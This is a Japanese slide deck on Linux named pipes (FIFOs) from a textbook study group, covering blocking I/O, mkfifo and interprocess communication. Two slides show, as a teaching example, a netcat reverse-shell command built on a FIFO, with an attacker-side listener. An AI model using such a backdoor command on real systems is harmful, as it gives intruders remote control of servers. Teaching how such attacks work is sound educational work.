Upgrade to Pro — share decks privately, control downloads, hide ads and more …

名前付きパイプ FIFO

Osumi, Yusuke
February 13, 2021
Technology
0
220

名前付きパイプ FIFO

「新しいLinuxの教科書」を読む会 オンライン #10 での発表資料です。
https://linuxbook.connpass.com/event/202890/

Osumi, Yusuke

February 13, 2021
Tweet

More Decks by Osumi, Yusuke

See All by Osumi, Yusuke
本の紹介の補足
ozuma
1
150
gitサービス3兄弟
ozuma
0
160
簡体字は楽
ozuma
0
170
ソフトウェアは固定資産
ozuma
0
190
ASCIIコードの小話
ozuma
0
190
今いるディレクトリを消すとどうなる
ozuma
1
100
文章、作文技法 リモートワーク
ozuma
1
560
CentOSの今後のリリース(簡易説明)
ozuma
0
190
AndroidでもLinux動いてるよ
ozuma
0
170

Other Decks in Technology

See All in Technology
スタートアップだからこそ考えるフロントエンドのテスト戦略
yoshinagaiwnl
4
540
可読性を高めるためのコードレビューテクニック
sbtechnight
PRO
0
470
ChatGPTにR言語を教えてもらう(仮)
doradora09
1
180
Federated Learning 連合学習
regonn
1
290
マネジメント3.0モデル入門(120分版)
takufujii
11
2.7k
AWS CDKで作るCloudWatch Dashboard
harukasakihara
3
490
Swift 開発が楽になる道具たち
megabitsenmzq
1
290
リアルとデジタルをつなぐ、Web3社会実装への取り組み
sbtechnight
PRO
0
390
八王子からお届けするノベルティ - YAPC::Kyoto 2023
uzulla
0
350
就活は相談したもの勝ち
carta_engineering
0
110
エンジニアのためのマネジメント入門/Introduction to Management for Software Engineers
dskst
1
280
学びが形になる!〜DeNAで6年間プロダクト開発に携わって学んだこと〜
dena_tech
PRO
0
340

Featured

See All Featured
No one is an island. Learnings from fostering a developers community.
thoeni
12
1.6k
Designing for humans not robots
tammielis
245
24k
Unsuck your backbone
ammeep
659
56k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
7
4.9k
Three Pipe Problems
jasonvnalue
89
9k
GitHub's CSS Performance
jonrohan
1021
430k
WebSockets: Embracing the real-time Web
robhawkes
58
6.1k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.6k
4 Signs Your Business is Dying
shpigford
171
20k
Embracing the Ebb and Flow
colly
76
3.6k
Support Driven Design
roundedbygravity
88
8.9k
Intergalactic Javascript Robots from Outer Space
tanoku
261
26k

Transcript

  1. 名前付きパイプ FIFO
    @ozuma5119
    1
    「新しいLinuxの教科書」を読む会 オンライン #10 2021/02/13

    View Slide

  2. 名前付きパイプ FIFO
    2
    書き込むと止まる(ブロッキングI/O)
    $ echo "Hello" > fifo
    $ tail -f fifo
    (別のターミナルで) 読み込んで解放

    View Slide

  3. 名前付きパイプ FIFO
    3
    先に読み込んでおく
    $ tail -f fifo
    $ echo "Hello" > fifo
    今度は書き込むとブロックされない

    View Slide

  4. 名前付きパイプ FIFO
    4
    書き込むと止まる(ブロッキングI/O)
    $ echo "Hello" > fifo
    1. 入出力中は他の処理が行えない (特に遅いディスクを扱う
    ときにつらい)
    2. ただし非同期処理で思わぬデータ破壊が起きにくい利点
    ※深い話なので、ここではこれ以上突っ込まない

    View Slide

  5. 5
    名前付きパイプ FIFO
    mkfifo - FIFO (名前付きパイプ) を作成する
    $ man mkfifo
    $ mkfifo fifo
    $ ls -l fifo
    prw-rw-r--. 1 ozuma ozuma 0 2月 12 20:47 fifo
    $

    View Slide

  6. 6
    $ cat sample.txt | sort
    $ cat sample.txt > fifo
    $ sort < fifo
    無名パイプ
    名前付きパイプ

    View Slide

  7. プロセス間通信に使われる
    7
    プロセス実行....
    ガッ
    SIGTERM(15)
    プロセスA
    プロセスB
    通信したいデータ
    シグナルによるプ
    ロセス間通信
    名前付きパイプによる
    プロセス間通信
    無名パイプ | と違って、
    2つのプロセスはバラバラに
    実行していて良い

    View Slide

  8. 高度な例(しかし実際の攻撃によく使われる)
    被害サーバ:ここでは /tmp/f が名前付きパイプ
    8
    $ nc < /tmp/f | /bin/sh >/tmp/f 2>&1
    攻撃者側サーバ:待ち受けておく
    $ nc -lvnp
    ※nc: netcatコマンド。ネットワークでデータストリームを流すcat
    サーバにバックドア Reverse Shell を作る

    View Slide

  9. 9
    攻撃者が攻撃対象のマシン
    上でコマンド実行
    (実際は、バレないように
    見えないところで実行)
    攻撃者のマシンに
    シェルがつながって
    自由に操作できる

    View Slide

  10. もう一度確認して解説
    被害サーバ:ここでは /tmp/f が名前付きパイプ
    10
    $ nc < /tmp/f | /bin/sh >/tmp/f 2>&1
    攻撃者側サーバ:待ち受けておく
    $ nc -lvnp
    ※nc: netcatコマンド。ネットワークでデータストリームを流すcat
    サーバにバックドア Reverse Shell を作る

    View Slide